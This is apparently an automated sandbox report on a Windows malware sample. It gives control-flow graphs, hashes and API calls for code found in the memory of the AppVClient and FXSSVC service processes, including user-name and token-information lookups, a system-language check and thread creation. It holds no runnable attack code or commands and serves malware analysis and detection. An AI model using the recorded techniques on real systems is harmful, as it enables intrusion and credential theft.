                                                                                                                                                                      control_flow_graph 522 b68090-b68096 523 b68184 522->523 524 b68186 CloseHandle 523->524 525 b6818c-b68192 523->525 524->525 526 b68194 525->526 527 b68115-b68118 525->527 526->527 528 b6819a 526->528 529 b680a7 527->529 530 b68119-b6811a 527->530 531 b6813c 528->531 530->529 532 b6811c 530->532 531->523 533 b6820f 532->533 534 b68215-b6821e 533->534 535 b6808e-b68096 533->535 534->535 537 b68224 534->537 535->523 535->529 538 b68226 537->538 539 b681d7-b681e6 call b9715c 537->539 538->539 540 b68228-b682ee call b65d90 538->540 549 b680ca-b6810f GetTokenInformation 539->549 550 b68089 539->550 551 b682f0 540->551 552 b6830c-b6831e 540->552 555 b68111 549->555 556 b6812d 549->556 550->549 554 b6808b 550->554 551->552 557 b682f2 551->557 558 b68320 552->558 559 b682a1-b682ba call b65d90 call b6ec00 552->559 560 b6808c 554->560 555->556 563 b68113 555->563 564 b68133 556->564 565 b680a8 556->565 561 b682f7-b682fc call b65d90 557->561 558->561 562 b68322 558->562 559->558 560->535 583 b68302 561->583 584 b68253-b68265 call b81280 561->584 562->561 567 b68324-b68326 562->567 563->527 564->531 570 b681ed-b681f0 564->570 568 b680aa-b680ad 565->568 572 b68328 567->572 573 b68163-b68170 call b97164 568->573 574 b680b3-b68203 568->574 575 b681f6 570->575 576 b680da-b680f1 570->576 586 b68335 572->586 587 b682df-b6832b 572->587 573->524 595 b68172 573->595 574->573 592 b68209 574->592 575->576 582 b681fc 575->582 576->568 590 b681fe-b68201 GetTokenInformation 582->590 583->584 591 b68308-b6830a 583->591 584->572 600 b6826b 584->600 598 b6826e-b68285 586->598 587->586 599 b6832d-b68331 587->599 590->533 607 b681b7 590->607 591->552 595->525 602 b68287 598->602 603 b6829b-b6829d 598->603 599->586 600->598 605 b68239 600->605 606 b6824c 602->606 603->559 605->572 608 b6823f-b68243 605->608 606->603 609 b6824e-b68252 606->609 607->533 610 b681b9-b681ca 607->610 608->561 608->606 609->598 613 b680f3 610->613 614 b681d0 610->614 613->560 615 b680f5 613->615 614->590 619 b680c3 614->619 615->560 620 b68077 615->620 619->590 621 b680c9 619->621 620->539 621->549
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction ID: fb8c92b46dc05e13b51c3d2b717c90f1b945820f25872b1e695e32a29daa3a96
                                                                                                                                                                      • Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
                                                                                                                                                                      • Instruction Fuzzy Hash: B7C08CB0128C0697523A02482C0B0B026C0C30F350B0C03C68C42A0220DD2D8E030097
                                                                                                                                                                      Function 00B6817F Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 622 b6817f 623 b68184 622->623 624 b68186 CloseHandle 623->624 625 b6818c-b68192 623->625 624->625 626 b68194 625->626 627 b68115-b68118 625->627 626->627 628 b6819a 626->628 629 b680a7 627->629 630 b68119-b6811a 627->630 631 b6813c 628->631 630->629 632 b6811c 630->632 631->623 633 b6820f 632->633 634 b68215-b6821e 633->634 635 b6808e-b68096 633->635 634->635 637 b68224 634->637 635->623 635->629 638 b68226 637->638 639 b681d7-b681e6 call b9715c 637->639 638->639 640 b68228-b682ee call b65d90 638->640 649 b680ca-b6810f GetTokenInformation 639->649 650 b68089 639->650 651 b682f0 640->651 652 b6830c-b6831e 640->652 655 b68111 649->655 656 b6812d 649->656 650->649 654 b6808b 650->654 651->652 657 b682f2 651->657 658 b68320 652->658 659 b682a1-b682ba call b65d90 call b6ec00 652->659 660 b6808c 654->660 655->656 663 b68113 655->663 664 b68133 656->664 665 b680a8 656->665 661 b682f7-b682fc call b65d90 657->661 658->661 662 b68322 658->662 659->658 660->635 683 b68302 661->683 684 b68253-b68265 call b81280 661->684 662->661 667 b68324-b68326 662->667 663->627 664->631 670 b681ed-b681f0 664->670 668 b680aa-b680ad 665->668 672 b68328 667->672 673 b68163-b68170 call b97164 668->673 674 b680b3-b68203 668->674 675 b681f6 670->675 676 b680da-b680f1 670->676 686 b68335 672->686 687 b682df-b6832b 672->687 673->624 695 b68172 673->695 674->673 692 b68209 674->692 675->676 682 b681fc 675->682 676->668 690 b681fe-b68201 GetTokenInformation 682->690 683->684 691 b68308-b6830a 683->691 684->672 700 b6826b 684->700 698 b6826e-b68285 686->698 687->686 699 b6832d-b68331 687->699 690->633 707 b681b7 690->707 691->652 695->625 702 b68287 698->702 703 b6829b-b6829d 698->703 699->686 700->698 705 b68239 700->705 706 b6824c 702->706 703->659 705->672 708 b6823f-b68243 705->708 706->703 709 b6824e-b68252 706->709 707->633 710 b681b9-b681ca 707->710 708->661 708->706 709->698 713 b680f3 710->713 714 b681d0 710->714 713->660 715 b680f5 713->715 714->690 719 b680c3 714->719 715->660 720 b68077 715->720 719->690 721 b680c9 719->721 720->639 721->649
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000F.00000002.1403794029.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_15_2_b60000_AppVClient.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2962429428-0
                                                                                                                                                                      • Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction ID: 1fc8fc8f7ba33a23edcdf1795213bfa5c9a16757eeeca68d844bcb8cc8b9b9b4
                                                                                                                                                                      • Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
                                                                                                                                                                      • Instruction Fuzzy Hash: 4EC092B055891987513A26882C0A0B235D0C71F760F0C47D2EC56BA361DD6D8E4341A2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:97.3%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:73
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 5623 425b42 5624 425b07 5623->5624 5624->5623 5625 425cdf CreateThread 5624->5625 5626 425b68 5624->5626 5625->5626 5627 4254a0 5625->5627 5628 4254b5 5627->5628 5629 425b00 5630 425bba 5629->5630 5637 4352c0 5630->5637 5632 425bc7 5636 425bde 5632->5636 5642 440080 5632->5642 5638 4352ce 5637->5638 5639 4352c6 5637->5639 5638->5632 5639->5638 5654 42e050 5639->5654 5647 440089 5642->5647 5643 440181 VirtualFree 5643->5647 5644 42e050 VirtualAlloc 5644->5647 5645 4403bf GetUserNameW 5645->5647 5646 425c7b 5648 428070 5646->5648 5647->5643 5647->5644 5647->5645 5647->5646 5653 428075 5648->5653 5649 428186 CloseHandle 5649->5653 5650 4280a7 5650->5636 5651 4280ca GetTokenInformation 5651->5653 5652 4281ad GetTokenInformation 5652->5653 5653->5649 5653->5650 5653->5651 5653->5652 5655 42e0c3 5654->5655 5656 42e0d8 VirtualAlloc 5655->5656 5656->5655 5670 425860 5671 4352c0 VirtualAlloc 5670->5671 5672 425869 5671->5672 5673 440080 3 API calls 5672->5673 5674 42587d 5673->5674 5675 428070 3 API calls 5674->5675 5676 425870 5675->5676 5663 425b87 CreateThread 5664 425b1c 5663->5664 5667 425810 5663->5667 5665 425cdf CreateThread 5664->5665 5666 425c01 5664->5666 5665->5666 5669 4254a0 5665->5669 5666->5666 5668 425822 5667->5668 5703 425b09 5704 425b16 5703->5704 5705 425cdf CreateThread 5704->5705 5706 425c01 5704->5706 5705->5706 5707 4254a0 5705->5707 5706->5706 5714 4255ef 5717 4255ac 5714->5717 5716 4255e4 5717->5716 5718 443870 5717->5718 5719 443876 5718->5719 5721 443893 5719->5721 5722 443720 5719->5722 5721->5717 5724 430c42 5722->5724 5723 42e050 VirtualAlloc 5723->5724 5724->5722 5724->5723 5725 4437dd 5724->5725 5725->5721 5725->5725 5677 428090 5681 428075 5677->5681 5678 428186 CloseHandle 5678->5681 5679 4280ca GetTokenInformation 5679->5681 5680 4281ad GetTokenInformation 5680->5681 5681->5678 5681->5679 5681->5680 5682 4280a7 5681->5682 5726 4257f0 5729 4255ac 5726->5729 5727 443870 VirtualAlloc 5727->5729 5728 4255e4 5729->5727 5729->5728 5657 4281b1 5661 428075 5657->5661 5658 428186 CloseHandle 5658->5661 5659 4280ca GetTokenInformation 5659->5661 5660 4281ad GetTokenInformation 5660->5661 5661->5658 5661->5659 5661->5660 5662 4280a7 5661->5662

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 004252A0 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 293 4252a0-4252a5 294 4252ab-4252f5 293->294 295 42532e-42533f 293->295 294->295 298 4252f7 294->298 299 42536b-425390 295->299 300 4253fe 298->300 306 425392-42539a 299->306 307 4253c3 299->307 302 425404-42540e 300->302 303 460d4c-460d4e 300->303 305 425424 302->305 308 42542a 305->308 309 42539b 305->309 306->309 308->309 312 425430-425443 308->312 310 425413-425419 309->310 311 42539d-4253a1 309->311 313 4252b0-4252b5 311->313 314 4253a7 311->314 314->313 315 4253ad 314->315 316 4253f3-4253f9 315->316 317 4253af-4253f1 315->317 316->300 320 425322-425328 316->320 317->310 317->316 321 425355 320->321 322 42532a 320->322 325 4252d1-4252e7 321->325 326 4252e8-425363 321->326 322->321 323 42532c 322->323 323->295 325->326 329 4253d1-4253d5 326->329 330 425365 326->330 329->311 332 4253d7 329->332 330->329 331 425367-425369 330->331 331->299 334 425400-42540e 332->334 335 42534b 332->335 334->305 335->334 336 425351-425353 335->336 336->321
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemDefaultLangID.KERNELBASE ref: 004253C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DefaultLangSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 706401283-0
                                                                                                                                                                      • Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction ID: 8a47e9f39304677f409a971bb96fb7c9d418da6cf03e87db8a3d5177a89a8352
                                                                                                                                                                      • Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
                                                                                                                                                                      • Instruction Fuzzy Hash: AE41C65170DEB58FD726922474643B2ABA09B123E2FD914D7D882C72E2D1BC4C42972F
                                                                                                                                                                      Function 00428070 Relevance: 4.7, APIs: 3, Instructions: 236COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 0 428070-42817e 2 428180 0->2 3 42813d-4281a5 0->3 2->3 5 428161 2->5 10 4281a7 3->10 11 4281bd-4281ca 3->11 8 428163-428170 call 457164 5->8 13 428172 8->13 14 428186 CloseHandle 8->14 17 4280f3 11->17 18 4281d0 11->18 16 42818c-428192 13->16 14->16 22 428194 16->22 23 428115-428118 16->23 19 4280f5 17->19 20 42808c 17->20 31 4280c3 18->31 32 4281fe-428201 GetTokenInformation 18->32 19->20 34 428077 19->34 25 42808e-428184 20->25 22->23 29 42819a 22->29 27 4280a7 23->27 28 428119-42811a 23->28 25->14 25->16 28->27 33 42811c 28->33 29->3 31->32 36 4280c9 31->36 37 42820f 32->37 44 4281b7 32->44 33->37 38 4281d7-4281de call 45715c 34->38 42 4280ca-4280d8 GetTokenInformation 36->42 37->25 40 428215-42821e 37->40 45 4281e3-4281e6 38->45 40->25 52 428224 40->52 46 42810f 42->46 44->37 47 4281b9-4281bb 44->47 45->42 60 428089 45->60 49 428111 46->49 50 42812d 46->50 47->11 49->50 53 428113 49->53 55 428133-4281f0 50->55 56 4280a8 50->56 52->38 58 428226 52->58 53->23 63 4281f6 55->63 64 4280da-4280f1 55->64 57 4280aa-4280ad 56->57 57->8 61 4280b3-428203 57->61 58->38 62 428228-4282ee call 425d90 58->62 60->42 65 42808b 60->65 61->8 69 428209 61->69 75 4282f0 62->75 76 42830c-428320 call 425d90 call 42ec00 62->76 63->64 68 4281fc 63->68 64->57 65->20 68->32 75->76 78 4282f2 75->78 79 4282f7-4282fc call 425d90 76->79 91 428322 76->91 78->79 85 428302 79->85 86 428253-428265 call 441280 79->86 85->86 88 428308-42830a 85->88 94 42826b 86->94 95 428328 86->95 88->76 91->79 93 428324-428326 91->93 93->95 94->95 98 42823f-428243 94->98 99 428335 95->99 100 4282df-42832b 95->100 98->79 103 428287 99->103 104 42829b-42829d 99->104 100->99 105 42832d-428331 100->105 103->104 107 42824e-428252 103->107 105->99 107->86
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction ID: 062cdad09a1dccd1c9da8856a9db376d4008f753bad528dba163b59ddf6dad7d
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 1061FF3070FA748FD7658B28B81423E7AA0BB65350FD9429F9446C22E1CF2C5C1A836F
                                                                                                                                                                      Function 00440080 Relevance: 2.0, APIs: 1, Instructions: 466COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 108 440080-440286 110 44028c 108->110 111 440099-440575 108->111 113 440445 110->113 115 440155 111->115 116 44057b 111->116 113->111 114 44044b-440457 113->114 117 440458-440472 114->117 119 4402ef-440495 call 42e050 * 2 115->119 116->115 118 440581-440587 116->118 131 44024c-440253 117->131 132 4403ee-4403f4 117->132 122 44058b 118->122 119->117 153 44043e 119->153 124 440181 VirtualFree 122->124 125 44058c-440591 122->125 129 4401a8-4402ac call 457164 124->129 126 440597 125->126 127 4404ab-4404af 125->127 126->127 133 44059d 126->133 144 4404c7 127->144 145 4402b1-4402be 129->145 136 440255 131->136 137 4401e6 131->137 149 4400da-44023f 132->149 150 4403fa 132->150 133->127 143 4402d3 136->143 137->145 147 4401ec-440313 call 45715c 137->147 143->137 148 4402d9 143->148 158 4404cc-4404e6 call 459970 144->158 151 4402c4 145->151 152 4403bf-4403d9 GetUserNameW 145->152 163 440318-44031e 147->163 148->119 149->131 161 440241-44024a 149->161 150->149 156 440400 150->156 151->152 159 4402ca 151->159 160 440331 152->160 153->113 162 44b1ee-44b49f 156->162 180 440131 158->180 181 4404ec-440514 158->181 159->143 165 440337 160->165 166 440171 160->166 161->131 161->145 167 440324 163->167 168 440568-44056b 163->168 165->166 172 44033d 165->172 169 440173 166->169 170 44013f-440146 166->170 167->168 174 44032a 167->174 168->158 175 440230 169->175 170->122 176 4405d0-4405d9 172->176 174->160 175->144 177 440236-4405c2 175->177 176->162 177->144 184 4405c8-4405c9 177->184 182 440137 180->182 183 440089-44008c 180->183 181->168 182->183 187 44013d 182->187 183->129 185 440092 183->185 184->176 185->129 188 440098 185->188 187->124 187->170 188->111
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction ID: 8005e838d64804137fa67e69ec8fa3b052c9f4a58d823fee826107e1ad4b30cf
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: FED14931418F0D8BE724EF58D8457EAB7D1FBA0310F18461FDA46C3264DA78DA658AC7
                                                                                                                                                                      Function 00425910 Relevance: 1.9, APIs: 1, Instructions: 607COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 189 425910-425968 191 425915-4259b8 call 459970 call 440df0 189->191 192 42596a 189->192 204 4259bd-4259c2 call 425d90 191->204 192->191 196 425931-43072c 192->196 200 430732-430738 196->200 201 430806-430809 196->201 202 430800 200->202 203 43073e 200->203 209 43079d-4307a6 201->209 202->201 208 4306b3-4306b7 202->208 203->202 206 430744-430774 203->206 211 4259c7-4259ce 204->211 215 4306d5-4306d9 206->215 216 43077a-43081c 206->216 208->209 212 4306bd 208->212 213 430791-430793 209->213 214 4307a8 209->214 217 4259d0 211->217 218 425a1a-425a26 call 425e10 211->218 212->209 219 4306c3-4307fe 212->219 220 4307ca-4307cc 213->220 214->213 221 4307aa 214->221 225 4306db 215->225 226 4306df 215->226 216->209 217->218 223 4259d2 217->223 242 425994-42599c 218->242 243 425a0d 218->243 219->202 221->220 228 4259d4-425a15 call 4411a0 223->228 225->226 229 4306dd 225->229 226->209 229->226 233 43c0cc 229->233 237 43c0e8-43c102 233->237 238 43c0ce-43c0d0 233->238 239 43c0d2-43c0df 237->239 241 43c104 237->241 238->239 250 43c0e7 239->250 241->239 241->250 248 425a02 242->248 249 42599e-4259f7 242->249 252 425932 243->252 253 425991 243->253 248->228 255 42597d 248->255 249->248 257 4259e4-4259ec call 4521ac 252->257 253->252 256 425993 253->256 255->228 259 42597f-425981 255->259 256->242 262 425a62-425a6e 257->262 263 4259ed 257->263 261 425983-425a38 259->261 261->242 266 425a3e call 452190 261->266 267 425a70 262->267 268 425a75-425ab3 call 441280 262->268 263->261 265 4259ee-4259ef 263->265 265->261 270 4259f1 265->270 266->242 279 4259e0 266->279 267->268 272 425a72 267->272 280 425ab5 268->280 281 425abb-425ac9 268->281 270->191 272->268 279->242 282 4259e2 279->282 280->281 283 425ab7-425ab9 280->283 284 425af2-425af5 281->284 282->257 283->281 287 425ad5 284->287 288 425adb-425adc 284->288 287->288 291 425ad7-425ad9 287->291 289 425ae2 288->289 290 425a45-425a46 288->290 289->290 292 425ae8 289->292 291->288 292->284
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction ID: 7bb32e801b6acd29df5aac314cfd129283357f91862d4bb627c80d1fd3c86720
                                                                                                                                                                      • Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
                                                                                                                                                                      • Instruction Fuzzy Hash: 4CF1372071CE588FD669A72D68513BB73D2E799314F58429FE04AC3396DE3C9C46838E
                                                                                                                                                                      Function 00425B42 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 337 425b42-425b47 call 425d90 339 425b4c-425b52 337->339 341 425c42-425c62 call 441280 339->341 342 425b0d 339->342 360 425c26 341->360 361 425c14-425cc0 341->361 342->341 343 425b13 342->343 345 425c8f-425c96 343->345 347 425c98-425c9a 345->347 348 425c29 345->348 350 425c9c 347->350 351 425cc2-425cc9 call 4252a0 348->351 352 425c2f-425c36 348->352 358 425bfa 350->358 359 425d0e-425d18 350->359 362 425ccb 351->362 363 425c69 351->363 352->351 354 425c3c 352->354 354->337 358->359 364 425c00 358->364 365 425d54 359->365 366 425d1a 359->366 360->361 368 425c28 360->368 361->351 362->350 369 425ccd 362->369 370 425b68-425d75 363->370 371 425c6f 363->371 364->361 372 425d4b-425d52 366->372 368->348 369->350 373 425ccf-425ce4 CreateThread 369->373 371->370 375 425c75 371->375 372->365 376 425d45-425d47 372->376 380 425c01-425c05 373->380 381 425cea 373->381 375->345 377 425d49 376->377 378 425d5f 376->378 377->372 377->378 382 425d65 378->382 385 425c20-425c68 380->385 388 425d37-425d41 380->388 381->380 384 425cf0-425cf6 381->384 382->382 384->385 388->372 389 425d43 388->389 389->365
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction ID: 49779e34ee639fb0c6bc4d66a31d1c2f9eb687a124b737a2bb5394a8c50f85d2
                                                                                                                                                                      • Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
                                                                                                                                                                      • Instruction Fuzzy Hash: 3121D33031CF608FCB699B1AB4487762AE1AB55350FE841A78447CF396EA3CDC45971E
                                                                                                                                                                      Function 00425B09 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 390 425b09-425d01 395 425d07 390->395 396 425bb4-425ce4 CreateThread 390->396 395->396 398 425d0d 395->398 401 425c01-425c05 396->401 402 425cea 396->402 400 425d37-425d41 398->400 403 425d43 400->403 404 425d4b-425d52 400->404 401->400 411 425c20-425c68 401->411 402->401 407 425cf0-425cf6 402->407 405 425d54 403->405 404->405 408 425d45-425d47 404->408 407->411 409 425d49 408->409 410 425d5f 408->410 409->404 409->410 414 425d65 410->414 414->414
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction ID: b7e3d5331c1304632278862209979492ce980127c8a9cafc856ea49140661027
                                                                                                                                                                      • Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
                                                                                                                                                                      • Instruction Fuzzy Hash: 2801D23031DF768FDB555624BC1837A7B90EB50324FE501AB8487CA295EABC4902A70F
                                                                                                                                                                      Function 00425B87 Relevance: 1.5, APIs: 1, Instructions: 23threadCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 415 425b87-425b99 CreateThread 416 425cff-425d01 415->416 417 425b1c-425b3b 415->417 418 425d07 416->418 419 425bb4-425ce4 CreateThread 416->419 417->416 418->419 422 425d0d 418->422 425 425c01-425c05 419->425 426 425cea 419->426 424 425d37-425d41 422->424 427 425d43 424->427 428 425d4b-425d52 424->428 425->424 435 425c20-425c68 425->435 426->425 431 425cf0-425cf6 426->431 429 425d54 427->429 428->429 432 425d45-425d47 428->432 431->435 433 425d49 432->433 434 425d5f 432->434 433->428 433->434 438 425d65 434->438 438->438
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                                                      • Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction ID: ca3ff88ea219f5825eb3369ad7927bf15066a86b53b2dd921e3d9a1caa2db0f4
                                                                                                                                                                      • Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
                                                                                                                                                                      • Instruction Fuzzy Hash: 21E0863070DB544FDB599B2468103193EE5EB88310F5502CFC44ADB2D5DB7D1A06878B
                                                                                                                                                                      Function 0042599B Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 439 42599b-42599e 440 4259f7 439->440 441 4259b8 call 440df0 439->441 443 425a02 440->443 444 4259bd-4259c2 call 425d90 441->444 447 4259d4-425a15 call 4411a0 443->447 448 42597d 443->448 449 4259c7-4259ce 444->449 448->447 450 42597f-425981 448->450 453 4259d0 449->453 454 425a1a-425a26 call 425e10 449->454 455 425983-425a38 450->455 453->454 457 4259d2 453->457 461 425994-42599c 454->461 469 425a0d 454->469 455->461 462 425a3e call 452190 455->462 457->447 461->443 464 42599e 461->464 462->461 475 4259e0 462->475 464->440 473 425932 469->473 474 425991 469->474 478 4259e4-4259ec call 4521ac 473->478 474->473 476 425993 474->476 475->461 477 4259e2 475->477 476->461 477->478 481 425a62-425a6e 478->481 482 4259ed 478->482 484 425a70 481->484 485 425a75-425ab3 call 441280 481->485 482->455 483 4259ee-4259ef 482->483 483->455 487 4259f1 call 459970 483->487 484->485 488 425a72 484->488 495 425ab5 485->495 496 425abb-425ac9 485->496 487->441 488->485 495->496 497 425ab7-425ab9 495->497 498 425af2-425af5 496->498 497->496 501 425ad5 498->501 502 425adb-425adc 498->502 501->502 505 425ad7-425ad9 501->505 503 425ae2 502->503 504 425a45-425a46 502->504 503->504 506 425ae8 503->506 505->502 506->498
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1284135714-0
                                                                                                                                                                      • Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
                                                                                                                                                                      • Instruction ID: 9f62b6bf6e1d1a510953f0bb591694cce4ae617f0899bc194266652dda0e6c9a
                                                                                                                                                                      • Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
